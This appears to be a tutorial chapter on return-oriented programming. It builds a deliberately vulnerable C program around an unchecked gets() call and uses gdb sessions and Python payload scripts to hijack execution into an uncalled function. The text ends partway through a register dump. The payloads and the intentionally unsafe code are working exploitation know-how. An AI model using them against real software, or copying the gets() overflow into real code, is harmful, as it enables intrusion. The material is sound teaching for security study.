0x0A – Before you begin ROP

As mentioned in 0x09, ROP is the technique used first and foremost to bypass DEP.

DEP ( Data Execution Prevention )

With DEP the stack and the heap may hold only data; they are mapped non-executable. Shellcode placed on the stack will therefore never run, and that is why we need ROP to get around it.

Before you begin ROP

Before studying ROP you must already know how function calls and RET work, so it helps a lot to have understood "Debugging with gdb part 2" first.

So let us first try to understand what ROP is about. Our task can be summed up as: we do not want EIP to land on the stack, because with DEP nothing on the stack will execute. That raises the question: if we cannot return to the stack, where do we put the shellcode and where do we return to? And how do we get execution to the place we choose? Before doing ROP proper, we will practise getting execution to exactly the place we want.

The goal is to understand ROP chains properly. Let us write a small program in C.

#include <stdio.h>

/* Never called from main: reaching it, with arguments, is the exercise. */
int add(int a, int b)
{
        return a = a + b;
}

int main()
{
        char buffer[16];
        gets(buffer);   /* no length check: this is the overflow */
}

Simple: main has an overflow vulnerability, and the add function is never called. But thanks to the overflow we are going to reach add, parameters and all. If we can do that, we can say we understand the idea.

When compiling, leave out -zexecstack: the stack stays non-executable, which is the DEP situation this chapter is about. -fno-stack-protector is needed so that a canary check does not abort the program before ret is reached.

 gcc -m32 -fno-stack-protector -o rop_u rop_u.c

First let us analyse the overflow: the offset and so on. (gdb disables ASLR for the debuggee by default, which is why the stack addresses below stay identical from run to run; outside gdb they would move unless ASLR is turned off system-wide.)

root@exploitdev:~/ROP# gdb rop_u
GNU gdb (Ubuntu 7.11.1-0ubuntu1~16.5) 7.11.1
Copyright (C) 2016 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from rop_u...(no debugging symbols found)...done.
(gdb) set disassembly-flavor intel
(gdb) disas main
Dump of assembler code for function main:
   0x08048419 <+0>:     lea    ecx,[esp+0x4]
   0x0804841d <+4>:     and    esp,0xfffffff0
   0x08048420 <+7>:     push   DWORD PTR [ecx-0x4]
   0x08048423 <+10>:    push   ebp
   0x08048424 <+11>:    mov    ebp,esp
   0x08048426 <+13>:    push   ecx
   0x08048427 <+14>:    sub    esp,0x14
   0x0804842a <+17>:    sub    esp,0xc
   0x0804842d <+20>:    lea    eax,[ebp-0x18]
   0x08048430 <+23>:    push   eax
   0x08048431 <+24>:    call   0x80482e0 <gets@plt>
   0x08048436 <+29>:    add    esp,0x10
   0x08048439 <+32>:    mov    eax,0x0
   0x0804843e <+37>:    mov    ecx,DWORD PTR [ebp-0x4]
   0x08048441 <+40>:    leave
   0x08048442 <+41>:    lea    esp,[ecx-0x4]
   0x08048445 <+44>:    ret
End of assembler dump.

Break at ret.

(gdb) break *main+44
Breakpoint 1 at 0x8048445

Break just before gets is called.

(gdb) break *main+24
Breakpoint 2 at 0x8048431

As usual, define a hook-stop so that the stack, the next instructions and the registers are dumped at every stop.

(gdb) define hook-stop
Type commands for definition of "hook-stop".
End with a line saying just "end".
>x/32wx $esp
>x/2i $eip
>info registers
>end

Run it.

(gdb) run
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/ROP/rop_u
0xffffd640:     0xffffd650      0x0000001f      0xf7e47830      0x0804849b
0xffffd650:     0x00000001      0xffffd714      0xffffd71c      0x08048471
0xffffd660:     0xf7fc93dc      0xffffd680      0x00000000      0xf7e31637
0xffffd670:     0xf7fc9000      0xf7fc9000      0x00000000      0xf7e31637
0xffffd680:     0x00000001      0xffffd714      0xffffd71c      0x00000000
0xffffd690:     0x00000000      0x00000000      0xf7fc9000      0xf7ffdc04
0xffffd6a0:     0xf7ffd000      0x00000000      0xf7fc9000      0xf7fc9000
0xffffd6b0:     0x00000000      0x6255e65e      0x5bd3084e      0x00000000
=> 0x8048431 <main+24>: call   0x80482e0 <gets@plt>
   0x8048436 <main+29>: add    esp,0x10
eax            0xffffd650       -10672
ecx            0xffffd680       -10624
edx            0xffffd6a4       -10588
ebx            0x0      0
esp            0xffffd640       0xffffd640
ebp            0xffffd668       0xffffd668
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x8048431        0x8048431 <main+24>
eflags         0x296    [ PF AF SF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99

Breakpoint 2, 0x08048431 in main ()

gets is about to be called, and we can see what the stack looks like at this point. Now let us feed it input.

(gdb) ni
AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHH
0x46464642:     Error while running hook_stop:
Cannot access memory at address 0x46464642

Breakpoint 1, 0x08048445 in main ()
(gdb) x/32wx $esp
0x46464642:     Cannot access memory at address 0x46464642

The problem: our esp itself has been turned into 46s (the "FFFF" of the input).

(gdb) info registers
eax            0x0      0
ecx            0x46464646       1179010630
edx            0xf7fca87c       -134436740
ebx            0x0      0
esp            0x46464642       0x46464642
ebp            0x47474747       0x47474747
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x8048445        0x8048445 <main+44>
eflags         0x286    [ PF SF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99

And ebp is 47s ("GGGG"). How do we get this under control?

ret pops the dword at the top of the stack into eip, right? But esp now points into garbage, so the program faults before ret can even read anything. So let us make esp point somewhere sensible.

This time, do not overflow all the way: 20 bytes exactly reach the end of the buffer's frame slot.

(gdb) ni
AAAABBBBCCCCDDDDEEEE
0xffffd5fc:     0x0000000a      0x00000000      0xf7e1d538      0xffffd620
0xffffd60c:     0x0804823b      0xf7fe87eb      0x00000000      0xf7fc9000
0xffffd61c:     0xffffd650      0xffffd668      0xf7feeff0      0xf7e7789b
0xffffd62c:     0x00000000      0xf7fc9000      0xf7fc9000      0xffffd668
0xffffd63c:     0x08048436      0xffffd650      0x0000001f      0xf7e47830
0xffffd64c:     0x0804849b      0x41414141      0x42424242      0x43434343
0xffffd65c:     0x44444444      0x45454545      0xffffd600      0x00000000
0xffffd66c:     0xf7e31637      0xf7fc9000      0xf7fc9000      0x00000000
=> 0x8048445 <main+44>: ret
   0x8048446:   xchg   ax,ax
eax            0x0      0
ecx            0xffffd600       -10752
edx            0xf7fca87c       -134436740
ebx            0x0      0
esp            0xffffd5fc       0xffffd5fc
ebp            0x0      0x0
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x8048445        0x8048445 <main+44>
eflags         0x286    [ PF SF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99

Breakpoint 1, 0x08048445 in main ()

Now we can see the real problem. It is caused by mov ecx,DWORD PTR [ebp-0x4] followed by the final lea esp,[ecx-0x4] (there is no pop ecx; ecx is reloaded from the frame). Whatever we write into [ebp-0x4], which is buffer+20, becomes ecx, and ecx-4 becomes the esp that ret pops from. In other words the saved ecx slot controls where ret reads its return address.

This time the frame is still mostly intact. Note that even 20 bytes changed something: gets wrote its terminating NUL at buffer+20, the low byte of the saved ecx, turning 0xffffd680 into 0xffffd600. So esp at ret is 0xffffd5fc, and after ret it will be

0xffffd600

Continue running:

(gdb) ni
0xffffd600:     0x00000000      0xf7e1d538      0xffffd620      0x0804823b
0xffffd610:     0xf7fe87eb      0x00000000      0xf7fc9000      0xffffd650
0xffffd620:     0xffffd668      0xf7feeff0      0xf7e7789b      0x00000000
0xffffd630:     0xf7fc9000      0xf7fc9000      0xffffd668      0x08048436
0xffffd640:     0xffffd650      0x0000001f      0xf7e47830      0x0804849b
0xffffd650:     0x41414141      0x42424242      0x43434343      0x44444444
0xffffd660:     0x45454545      0xffffd600      0x00000000      0xf7e31637
0xffffd670:     0xf7fc9000      0xf7fc9000      0x00000000      0xf7e31637
=> 0xa: Error while running hook_stop:
Cannot access memory at address 0xa
0x0000000a in ?? ()

With the first input we overwrote that slot (the saved ecx) as well, so we could not see what was going on. Now that we know the mechanism, here is our input on the stack:

0xffffd650: 0x41414141 0x42424242 0x43434343 0x44444444
0xffffd660: 0x45454545

Can we not make this the top of the stack at the time of ret?

import struct
import sys

offset = b"AAAABBBBCCCCDDDDEEEE"           # 20 bytes: from buffer start to the saved ecx at [ebp-0x4]
newesp = struct.pack("<I", 0xffffd650)     # overwrite the saved ecx with the buffer address
sys.stdout.buffer.write(offset + newesp + b"\n")   # raw bytes; the newline ends gets()

Write the payload to a file so it can be redirected into the program under gdb.

python3 rop.py > rop.txt

Run it:

(gdb) r < rop.txt
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/ROP/rop_u < rop.txt
0xffffd640:     0xffffd650      0x0000001f      0xf7e47830      0x0804849b
0xffffd650:     0x00000001      0xffffd714      0xffffd71c      0x08048471
0xffffd660:     0xf7fc93dc      0xffffd680      0x00000000      0xf7e31637
0xffffd670:     0xf7fc9000      0xf7fc9000      0x00000000      0xf7e31637
0xffffd680:     0x00000001      0xffffd714      0xffffd71c      0x00000000
0xffffd690:     0x00000000      0x00000000      0xf7fc9000      0xf7ffdc04
0xffffd6a0:     0xf7ffd000      0x00000000      0xf7fc9000      0xf7fc9000
0xffffd6b0:     0x00000000      0x1e925b35      0x2714b525      0x00000000
=> 0x8048431 <main+24>: call   0x80482e0 <gets@plt>
   0x8048436 <main+29>: add    esp,0x10
eax            0xffffd650       -10672
ecx            0xffffd680       -10624
edx            0xffffd6a4       -10588
ebx            0x0      0
esp            0xffffd640       0xffffd640
ebp            0xffffd668       0xffffd668
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x8048431        0x8048431 <main+24>
eflags         0x296    [ PF AF SF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99

Breakpoint 2, 0x08048431 in main ()

Continue so that the input is read in.

(gdb) ni
0xffffd64c:     0x0804849b      0x41414141      0x42424242      0x43434343
0xffffd65c:     0x44444444      0x45454545      0xffffd650      0x00000000
0xffffd66c:     0xf7e31637      0xf7fc9000      0xf7fc9000      0x00000000
0xffffd67c:     0xf7e31637      0x00000001      0xffffd714      0xffffd71c
0xffffd68c:     0x00000000      0x00000000      0x00000000      0xf7fc9000
0xffffd69c:     0xf7ffdc04      0xf7ffd000      0x00000000      0xf7fc9000
0xffffd6ac:     0xf7fc9000      0x00000000      0x1e925b35      0x2714b525
0xffffd6bc:     0x00000000      0x00000000      0x00000000      0x00000001
=> 0x8048445 <main+44>: ret
   0x8048446:   xchg   ax,ax
eax            0x0      0
ecx            0xffffd650       -10672
edx            0xf7fca87c       -134436740
ebx            0x0      0
esp            0xffffd64c       0xffffd64c
ebp            0x0      0x0
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x8048445        0x8048445 <main+44>
eflags         0x286    [ PF SF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99

Breakpoint 1, 0x08048445 in main ()

0x0804849b is what sits at the top of the stack now: esp is 0xffffd64c, one dword before our buffer, so ret would pop that value instead of our AAAA. We need to look at this more closely.

After leave there is the LEA again, and it uses ecx-0x4:

lea    esp,[ecx-0x4]

ecx holds the 0xffffd650 we supplied. Subtracting 4 from it lands one dword before the 41s:

(gdb) x $ecx-0x4
   0xffffd64c:  fwait

Knowing this, only one thing is left to do: the code subtracts 4, so we add 4 beforehand. The padding after newesp lands in the saved ebp and beyond, which lets us watch ebp change too.

import struct
import sys

offset  = b"AAAABBBBCCCCDDDDEEEE"
newesp  = struct.pack("<I", 0xffffd650 + 0x4)   # lea esp,[ecx-0x4] subtracts 4, so add 4 here
padding = b"GGGGHHHHIIIIJJJJKKKK"               # overwrites the saved ebp and what follows
sys.stdout.buffer.write(offset + newesp + padding + b"\n")

Back to gdb. Besides the two breakpoints above, a third one at main+29 (the instruction right after gets returns) is set the same way, so the transcript below stops there as well and then single-steps through the epilogue.

(gdb) r < rop.txt
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/ROP/rop_u < rop.txt
0xffffd640:     0xffffd650      0x0000001f      0xf7e47830      0x0804849b
0xffffd650:     0x00000001      0xffffd714      0xffffd71c      0x08048471
0xffffd660:     0xf7fc93dc      0xffffd680      0x00000000      0xf7e31637
0xffffd670:     0xf7fc9000      0xf7fc9000      0x00000000      0xf7e31637
0xffffd680:     0x00000001      0xffffd714      0xffffd71c      0x00000000
0xffffd690:     0x00000000      0x00000000      0xf7fc9000      0xf7ffdc04
0xffffd6a0:     0xf7ffd000      0x00000000      0xf7fc9000      0xf7fc9000
0xffffd6b0:     0x00000000      0xe488a6a9      0xdd0e48b9      0x00000000
=> 0x8048431 <main+24>: call   0x80482e0 <gets@plt>
   0x8048436 <main+29>: add    esp,0x10
eax            0xffffd650       -10672
ecx            0xffffd680       -10624
edx            0xffffd6a4       -10588
ebx            0x0      0
esp            0xffffd640       0xffffd640
ebp            0xffffd668       0xffffd668
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x8048431        0x8048431 <main+24>
eflags         0x296    [ PF AF SF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99

Breakpoint 2, 0x08048431 in main ()
(gdb) ni
0xffffd640:     0xffffd650      0x0000001f      0xf7e47830      0x0804849b
0xffffd650:     0x41414141      0x42424242      0x43434343      0x44444444
0xffffd660:     0x45454545      0xffffd654      0x47474747      0x48484848
0xffffd670:     0x49494949      0x4a4a4a4a      0x4b4b4b4b      0xf7e31600
0xffffd680:     0x00000001      0xffffd714      0xffffd71c      0x00000000
0xffffd690:     0x00000000      0x00000000      0xf7fc9000      0xf7ffdc04
0xffffd6a0:     0xf7ffd000      0x00000000      0xf7fc9000      0xf7fc9000
0xffffd6b0:     0x00000000      0xe488a6a9      0xdd0e48b9      0x00000000
=> 0x8048436 <main+29>: add    esp,0x10
   0x8048439 <main+32>: mov    eax,0x0
eax            0xffffd650       -10672
ecx            0xf7fc95a0       -134441568
edx            0xf7fca87c       -134436740
ebx            0x0      0
esp            0xffffd640       0xffffd640
ebp            0xffffd668       0xffffd668
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x8048436        0x8048436 <main+29>
eflags         0x246    [ PF ZF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99

Breakpoint 3, 0x08048436 in main ()
(gdb)
0xffffd650:     0x41414141      0x42424242      0x43434343      0x44444444
0xffffd660:     0x45454545      0xffffd654      0x47474747      0x48484848
0xffffd670:     0x49494949      0x4a4a4a4a      0x4b4b4b4b      0xf7e31600
0xffffd680:     0x00000001      0xffffd714      0xffffd71c      0x00000000
0xffffd690:     0x00000000      0x00000000      0xf7fc9000      0xf7ffdc04
0xffffd6a0:     0xf7ffd000      0x00000000      0xf7fc9000      0xf7fc9000
0xffffd6b0:     0x00000000      0xe488a6a9      0xdd0e48b9      0x00000000
0xffffd6c0:     0x00000000      0x00000000      0x00000001      0x08048310
=> 0x8048439 <main+32>: mov    eax,0x0
   0x804843e <main+37>: mov    ecx,DWORD PTR [ebp-0x4]
eax            0xffffd650       -10672
ecx            0xf7fc95a0       -134441568
edx            0xf7fca87c       -134436740
ebx            0x0      0
esp            0xffffd650       0xffffd650
ebp            0xffffd668       0xffffd668
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x8048439        0x8048439 <main+32>
eflags         0x286    [ PF SF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99
0x08048439 in main ()
(gdb)
0xffffd650:     0x41414141      0x42424242      0x43434343      0x44444444
0xffffd660:     0x45454545      0xffffd654      0x47474747      0x48484848
0xffffd670:     0x49494949      0x4a4a4a4a      0x4b4b4b4b      0xf7e31600
0xffffd680:     0x00000001      0xffffd714      0xffffd71c      0x00000000
0xffffd690:     0x00000000      0x00000000      0xf7fc9000      0xf7ffdc04
0xffffd6a0:     0xf7ffd000      0x00000000      0xf7fc9000      0xf7fc9000
0xffffd6b0:     0x00000000      0xe488a6a9      0xdd0e48b9      0x00000000
0xffffd6c0:     0x00000000      0x00000000      0x00000001      0x08048310
=> 0x804843e <main+37>: mov    ecx,DWORD PTR [ebp-0x4]
   0x8048441 <main+40>: leave
eax            0x0      0
ecx            0xf7fc95a0       -134441568
edx            0xf7fca87c       -134436740
ebx            0x0      0
esp            0xffffd650       0xffffd650
ebp            0xffffd668       0xffffd668
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x804843e        0x804843e <main+37>
eflags         0x286    [ PF SF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99
0x0804843e in main ()
(gdb)
0xffffd650:     0x41414141      0x42424242      0x43434343      0x44444444
0xffffd660:     0x45454545      0xffffd654      0x47474747      0x48484848
0xffffd670:     0x49494949      0x4a4a4a4a      0x4b4b4b4b      0xf7e31600
0xffffd680:     0x00000001      0xffffd714      0xffffd71c      0x00000000
0xffffd690:     0x00000000      0x00000000      0xf7fc9000      0xf7ffdc04
0xffffd6a0:     0xf7ffd000      0x00000000      0xf7fc9000      0xf7fc9000
0xffffd6b0:     0x00000000      0xe488a6a9      0xdd0e48b9      0x00000000
0xffffd6c0:     0x00000000      0x00000000      0x00000001      0x08048310
=> 0x8048441 <main+40>: leave
   0x8048442 <main+41>: lea    esp,[ecx-0x4]
eax            0x0      0
ecx            0xffffd654       -10668
edx            0xf7fca87c       -134436740
ebx            0x0      0
esp            0xffffd650       0xffffd650
ebp            0xffffd668       0xffffd668
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x8048441        0x8048441 <main+40>
eflags         0x286    [ PF SF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99
0x08048441 in main ()
(gdb)
0xffffd66c:     0x48484848      0x49494949      0x4a4a4a4a      0x4b4b4b4b
0xffffd67c:     0xf7e31600      0x00000001      0xffffd714      0xffffd71c
0xffffd68c:     0x00000000      0x00000000      0x00000000      0xf7fc9000
0xffffd69c:     0xf7ffdc04      0xf7ffd000      0x00000000      0xf7fc9000
0xffffd6ac:     0xf7fc9000      0x00000000      0xe488a6a9      0xdd0e48b9
0xffffd6bc:     0x00000000      0x00000000      0x00000000      0x00000001
0xffffd6cc:     0x08048310      0x00000000      0xf7feeff0      0xf7fe9880
0xffffd6dc:     0xf7ffd000      0x00000001      0x08048310      0x00000000
=> 0x8048442 <main+41>: lea    esp,[ecx-0x4]
   0x8048445 <main+44>: ret
eax            0x0      0
ecx            0xffffd654       -10668
edx            0xf7fca87c       -134436740
ebx            0x0      0
esp            0xffffd66c       0xffffd66c
ebp            0x47474747       0x47474747
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x8048442        0x8048442 <main+41>
eflags         0x286    [ PF SF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99
0x08048442 in main ()
(gdb)
0xffffd650:     0x41414141      0x42424242      0x43434343      0x44444444
0xffffd660:     0x45454545      0xffffd654      0x47474747      0x48484848
0xffffd670:     0x49494949      0x4a4a4a4a      0x4b4b4b4b      0xf7e31600
0xffffd680:     0x00000001      0xffffd714      0xffffd71c      0x00000000
0xffffd690:     0x00000000      0x00000000      0xf7fc9000      0xf7ffdc04
0xffffd6a0:     0xf7ffd000      0x00000000      0xf7fc9000      0xf7fc9000
0xffffd6b0:     0x00000000      0xe488a6a9      0xdd0e48b9      0x00000000
0xffffd6c0:     0x00000000      0x00000000      0x00000001      0x08048310
=> 0x8048445 <main+44>: ret
   0x8048446:   xchg   ax,ax
eax            0x0      0
ecx            0xffffd654       -10668
edx            0xf7fca87c       -134436740
ebx            0x0      0
esp            0xffffd650       0xffffd650
ebp            0x47474747       0x47474747
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x8048445        0x8048445 <main+44>
eflags         0x286    [ PF SF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99

Breakpoint 1, 0x08048445 in main ()
(gdb)
0xffffd654:     0x42424242      0x43434343      0x44444444      0x45454545
0xffffd664:     0xffffd654      0x47474747      0x48484848      0x49494949
0xffffd674:     0x4a4a4a4a      0x4b4b4b4b      0xf7e31600      0x00000001
0xffffd684:     0xffffd714      0xffffd71c      0x00000000      0x00000000
0xffffd694:     0x00000000      0xf7fc9000      0xf7ffdc04      0xf7ffd000
0xffffd6a4:     0x00000000      0xf7fc9000      0xf7fc9000      0x00000000
0xffffd6b4:     0xe488a6a9      0xdd0e48b9      0x00000000      0x00000000
0xffffd6c4:     0x00000000      0x00000001      0x08048310      0x00000000
=> 0x41414141:  Error while running hook_stop:
Cannot access memory at address 0x41414141
0x41414141 in ?? ()

Woot! We finally control EIP 😀

Now let us jump straight to the add function. Remember that it takes two parameters.

First, the address of add:

(gdb) disas add
Dump of assembler code for function add:
   0x0804840b <+0>:     push   ebp
   0x0804840c <+1>:     mov    ebp,esp
   0x0804840e <+3>:     mov    eax,DWORD PTR [ebp+0xc]
   0x08048411 <+6>:     add    DWORD PTR [ebp+0x8],eax
   0x08048414 <+9>:     mov    eax,DWORD PTR [ebp+0x8]
   0x08048417 <+12>:    pop    ebp
   0x08048418 <+13>:    ret
End of assembler dump.

0x0804840b it is 😉

import struct
import sys

addfunction = struct.pack("<I", 0x0804840b)        # address of add(); ret pops this into eip
firstparam  = struct.pack("<I", 0x00000002)
secondparam = struct.pack("<I", 0x00000003)
offset      = b"DDDDEEEE"                          # fill up to the saved ecx at buffer+20
newesp      = struct.pack("<I", 0xffffd650 + 0x4)  # saved ecx; lea esp,[ecx-0x4] gives esp = buffer
padding     = b"GGGGHHHHIIIIJJJJKKKK"
# Note: after ret pops addfunction, esp points at firstparam. That dword is what
# add will treat as its return address ([ebp+0x4] after push ebp; mov ebp,esp);
# add reads its arguments from [ebp+0x8] and [ebp+0xc], i.e. secondparam and "DDDD".
sys.stdout.buffer.write(addfunction + firstparam + secondparam + offset + newesp + padding + b"\n")

When ready, let us check whether it works. Keep the cdecl layout in mind while watching: when ret jumps into add, esp already points at the dword after the function address, and that dword is what add will later return to; the arguments it reads are the two dwords after that.

(gdb) r < rop.txt
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /root/ROP/rop_u < rop.txt
0xffffd640:     0xffffd650      0x0000001f      0xf7e47830      0x0804849b
0xffffd650:     0x00000001      0xffffd714      0xffffd71c      0x08048471
0xffffd660:     0xf7fc93dc      0xffffd680      0x00000000      0xf7e31637
0xffffd670:     0xf7fc9000      0xf7fc9000      0x00000000      0xf7e31637
0xffffd680:     0x00000001      0xffffd714      0xffffd71c      0x00000000
0xffffd690:     0x00000000      0x00000000      0xf7fc9000      0xf7ffdc04
0xffffd6a0:     0xf7ffd000      0x00000000      0xf7fc9000      0xf7fc9000
0xffffd6b0:     0x00000000      0xc1bf2a5e      0xf839c44e      0x00000000
=> 0x8048431 <main+24>: call   0x80482e0 <gets@plt>
   0x8048436 <main+29>: add    esp,0x10
eax            0xffffd650       -10672
ecx            0xffffd680       -10624
edx            0xffffd6a4       -10588
ebx            0x0      0
esp            0xffffd640       0xffffd640
ebp            0xffffd668       0xffffd668
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x8048431        0x8048431 <main+24>
eflags         0x296    [ PF AF SF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99

Breakpoint 2, 0x08048431 in main ()
(gdb) ni
0xffffd640:     0xffffd650      0x0000001f      0xf7e47830      0x0804849b
0xffffd650:     0x0804840b      0x00000002      0x00000003      0x44444444
0xffffd660:     0x45454545      0xffffd654      0x47474747      0x48484848
0xffffd670:     0x49494949      0x4a4a4a4a      0x4b4b4b4b      0xf7e31600
0xffffd680:     0x00000001      0xffffd714      0xffffd71c      0x00000000
0xffffd690:     0x00000000      0x00000000      0xf7fc9000      0xf7ffdc04
0xffffd6a0:     0xf7ffd000      0x00000000      0xf7fc9000      0xf7fc9000
0xffffd6b0:     0x00000000      0xc1bf2a5e      0xf839c44e      0x00000000
=> 0x8048436 <main+29>: add    esp,0x10
   0x8048439 <main+32>: mov    eax,0x0
eax            0xffffd650       -10672
ecx            0xf7fc95a0       -134441568
edx            0xf7fca87c       -134436740
ebx            0x0      0
esp            0xffffd640       0xffffd640
ebp            0xffffd668       0xffffd668
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x8048436        0x8048436 <main+29>
eflags         0x246    [ PF ZF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99

Breakpoint 3, 0x08048436 in main ()
(gdb)
0xffffd650:     0x0804840b      0x00000002      0x00000003      0x44444444
0xffffd660:     0x45454545      0xffffd654      0x47474747      0x48484848
0xffffd670:     0x49494949      0x4a4a4a4a      0x4b4b4b4b      0xf7e31600
0xffffd680:     0x00000001      0xffffd714      0xffffd71c      0x00000000
0xffffd690:     0x00000000      0x00000000      0xf7fc9000      0xf7ffdc04
0xffffd6a0:     0xf7ffd000      0x00000000      0xf7fc9000      0xf7fc9000
0xffffd6b0:     0x00000000      0xc1bf2a5e      0xf839c44e      0x00000000
0xffffd6c0:     0x00000000      0x00000000      0x00000001      0x08048310
=> 0x8048439 <main+32>: mov    eax,0x0
   0x804843e <main+37>: mov    ecx,DWORD PTR [ebp-0x4]
eax            0xffffd650       -10672
ecx            0xf7fc95a0       -134441568
edx            0xf7fca87c       -134436740
ebx            0x0      0
esp            0xffffd650       0xffffd650
ebp            0xffffd668       0xffffd668
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x8048439        0x8048439 <main+32>
eflags         0x286    [ PF SF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99
0x08048439 in main ()
(gdb)
0xffffd650:     0x0804840b      0x00000002      0x00000003      0x44444444
0xffffd660:     0x45454545      0xffffd654      0x47474747      0x48484848
0xffffd670:     0x49494949      0x4a4a4a4a      0x4b4b4b4b      0xf7e31600
0xffffd680:     0x00000001      0xffffd714      0xffffd71c      0x00000000
0xffffd690:     0x00000000      0x00000000      0xf7fc9000      0xf7ffdc04
0xffffd6a0:     0xf7ffd000      0x00000000      0xf7fc9000      0xf7fc9000
0xffffd6b0:     0x00000000      0xc1bf2a5e      0xf839c44e      0x00000000
0xffffd6c0:     0x00000000      0x00000000      0x00000001      0x08048310
=> 0x804843e <main+37>: mov    ecx,DWORD PTR [ebp-0x4]
   0x8048441 <main+40>: leave
eax            0x0      0
ecx            0xf7fc95a0       -134441568
edx            0xf7fca87c       -134436740
ebx            0x0      0
esp            0xffffd650       0xffffd650
ebp            0xffffd668       0xffffd668
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x804843e        0x804843e <main+37>
eflags         0x286    [ PF SF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99
0x0804843e in main ()
(gdb)
0xffffd650:     0x0804840b      0x00000002      0x00000003      0x44444444
0xffffd660:     0x45454545      0xffffd654      0x47474747      0x48484848
0xffffd670:     0x49494949      0x4a4a4a4a      0x4b4b4b4b      0xf7e31600
0xffffd680:     0x00000001      0xffffd714      0xffffd71c      0x00000000
0xffffd690:     0x00000000      0x00000000      0xf7fc9000      0xf7ffdc04
0xffffd6a0:     0xf7ffd000      0x00000000      0xf7fc9000      0xf7fc9000
0xffffd6b0:     0x00000000      0xc1bf2a5e      0xf839c44e      0x00000000
0xffffd6c0:     0x00000000      0x00000000      0x00000001      0x08048310
=> 0x8048441 <main+40>: leave
   0x8048442 <main+41>: lea    esp,[ecx-0x4]
eax            0x0      0
ecx            0xffffd654       -10668
edx            0xf7fca87c       -134436740
ebx            0x0      0
esp            0xffffd650       0xffffd650
ebp            0xffffd668       0xffffd668
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
eip            0x8048441        0x8048441 <main+40>
eflags         0x286    [ PF SF IF ]
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x63     99
0x08048441 in main ()
(gdb)
0xffffd66c:     0x48484848      0x49494949      0x4a4a4a4a      0x4b4b4b4b
0xffffd67c:     0xf7e31600      0x00000001      0xffffd714      0xffffd71c
0xffffd68c:     0x00000000      0x00000000      0x00000000      0xf7fc9000
0xffffd69c:     0xf7ffdc04      0xf7ffd000      0x00000000      0xf7fc9000
0xffffd6ac:     0xf7fc9000      0x00000000      0xc1bf2a5e      0xf839c44e
0xffffd6bc:     0x00000000      0x00000000      0x00000000      0x00000001
0xffffd6cc:     0x08048310      0x00000000      0xf7feeff0      0xf7fe9880
0xffffd6dc:     0xf7ffd000      0x00000001      0x08048310      0x00000000
=> 0x8048442 <main+41>: lea    esp,[ecx-0x4]
   0x8048445 <main+44>: ret
eax            0x0      0
ecx            0xffffd654       -10668
edx            0xf7fca87c       -134436740
ebx            0x0      0
esp            0xffffd66c       0xffffd66c
ebp            0x47474747       0x47474747
esi            0xf7fc9000       -134443008
edi            0xf7fc9000       -134443008
